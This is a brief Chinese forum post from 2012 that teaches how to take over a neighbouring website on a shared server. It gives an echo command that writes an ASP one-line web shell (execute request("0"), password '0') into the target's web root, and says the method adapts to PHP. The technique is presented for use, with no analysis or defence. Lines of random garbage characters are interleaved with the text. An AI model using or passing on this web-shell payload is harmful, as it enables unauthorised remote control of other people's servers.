在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。4 r5 q; f/ M' j* H
( W' S, J2 }6 L/ I9 \( w! H0 ]& F: {命令格式
) v3 x* }$ p# f7 O; h* ]* s7 R7 G. V8 g+ o
Echo 语句 >目标站绝对目录
1 B" M! a! m( m* Q& H; U3 Y0 e3 i5 o) j' [( @0 q0 B
例如:
/ a* [) b# o# ]$ i0 t, x/ Q0 U" z8 a" ~( a' y( h
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp( g. p: H; y+ Y& q- o7 x2 Y' r
/ `, g% D3 ^) D5 S J* L8 y这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
0 x7 C( J$ l: Z3 S( Q |
发表于 2012-9-23 14:40:24
收藏
支持
反对